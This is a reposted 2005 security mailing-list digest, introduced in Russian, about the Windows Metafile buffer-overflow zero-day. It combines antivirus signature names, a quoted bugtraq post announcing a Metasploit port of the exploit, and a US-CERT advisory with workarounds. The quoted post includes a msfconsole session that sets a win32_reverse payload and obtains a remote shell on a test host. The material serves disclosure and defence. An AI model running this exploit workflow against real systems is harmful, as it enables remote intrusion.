Я послал еще - так как информация разбросана по ряду источников и сейчас
наичается активное освоение этого эксплойта хакерами, судя по листам рассылки
Так что - информация о распознавании его антивирусами от A. Marx, готовый
эксплойт от HD Moore и бюллетень CERT, где более-менее систематически описаны
меры защиты (в отличие от бюллетеня M$)
-------------------------
yes, it seems to be a new exploit. More details about the problem can be found
here:
Some AV companies have created signatures for the latest critter already:
AntiVir TR/Dldr.WMF.Small
Dr Web Exploit.MS05-053
F-Secure Exploit.Win32.Agent.r
Fortinet W32/WMF-exploit
Kaspersky Exploit.Win32.Agent.r
McAfee (BETA) Exploit-WMF trojan
Symantec (BETA) Download.Trojan
-------------------------
> -----Original Message-----
> From: H D Moore [mailto:sflist@xxxxxxxxxxxxxxxxxx]
> Sent: Wednesday, December 28, 2005 6:35 AM
> To: bugtraq@xxxxxxxxxxxxxxxxx
> Subject: Re: Is this a new exploit?
>
> I ported the exploit to the Metasploit Framework in case
> anyone wants to
> test it without installing a thousand spyware apps...
>
> Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:
>
> --
> _pfv_metafile
> --
>
> Tested on Win XP SP1 and SP2.
>
> -HD
>
> + -- --=[ msfconsole v2.5 [147 exploits - 77 payloads]
>
> msf > use ie_xp_pfv_metafile
> msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
> PAYLOAD -> win32_reverse
> msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2
> LHOST -> 192.168.0.2
> msf ie_xp_pfv_metafile(win32_reverse) > exploit
>
> [*] Starting Reverse Handler.
> [*] Waiting for connections to
> [*] HTTP Client connected from 192.168.0.219:1060 using Windows XP
> [*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061
>
> Microsoft Windows XP [Version 5.1.2600]
> (C) Copyright 1985-2001 Microsoft Corp.
>
> C:\Documents and Settings\XXXX\Desktop>
>
>
------------------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Microsoft Windows Metafile Handling Buffer Overflow
Original release date: December 28, 2005
Last revised: --
Source: US-CERT
Systems Affected
* Systems running Microsoft Windows
Overview
Microsoft Windows is vulnerable to remote code execution via an error
in handling files using the Windows Metafile image format. Exploit
code has been publicly posted and used to successfully attack
fully-patched Windows XP SP2 systems. However, other versions of the
the Windows operating system may be at risk as well.
I. Description
Microsoft Windows Metafiles are image files that can contain both
vector and bitmap-based picture information. Microsoft Windows
contains routines for displaying various Windows Metafile formats.
However, a lack of input validation in one of these routines may allow
a buffer overflow to occur, and in turn may allow remote arbitrary
code execution.
This new vulnerability may be similar to one Microsoft released
patches for in Microsoft Security Bulletin MS05-053. However, publicly
available exploit code is known to affect systems updated with the
MS05-053 patches.
Not all anti-virus software products are currently able to detect all
known variants of exploits for this vulnerability. However, US-CERT
recommends updating anti-virus signatures as frequently as practical
to provide maximum protection as new variants appear.
US-CERT is tracking this issue as VU#181038. This reference number
corresponds to CVE entry CVE-2005-4560.
II. Impact
A remote, unauthenticated attacker may be able to execute arbitrary
code if the user is persuaded to view a specially crafted Windows
Metafile.
III. Solution
Since there is no known patch for this issue at this time, US-CERT is
recommending sites follow several potential workarounds.
Workarounds
Please be aware US-CERT has confirmed that filtering based just on the
WMF file extension or MIME type "application/x-msmetafile" will not
block all known attack vectors for this vulnerability. Filter
mechanisms should be looking for any file that Microsoft Windows
recognizes as a Windows Metafile by virtue of its file header.
Do not access Windows Metafiles from untrusted sources
Exploitation occurs by accessing a specially crafted Windows Metafile.
By only accessing Windows Metafiles from trusted or known sources, the
chances of exploitation are reduced.
Attackers may host malicious Windows Metafiles on a web site. In order
to convince users to visit their sites, those attackers often use URL
encoding, IP address variations, long URLs, intentional misspellings,
and other techniques to create misleading links. Do not click on
unsolicited links received in email, instant messages, web forums, or
internet relay chat (IRC) channels. Type URLs directly into the
browser to avoid these misleading links. While these are generally
good security practices, following these behaviors will not prevent
exploitation of this vulnerability in all cases, particularly if a
trusted site has been compromised or allows cross-site scripting.
Block access to Windows Metafiles at network perimeters
By blocking access to Windows Metafiles using HTTP proxies, mail
gateways, and other network filter technologies, system administrators
may also limit other potential attack vectors.
Reset the program association for Windows Metafiles
Remapping handling of Windows Metafiles to open a program other than
the default Windows Picture and Fax Viewer (SHIMGVW.DLL) may prevent
exploitation via some current attack vectors. However, this may still
allow the underlying vulnerability to be exploited via other known
attack vectors.
_________________________________________________________________
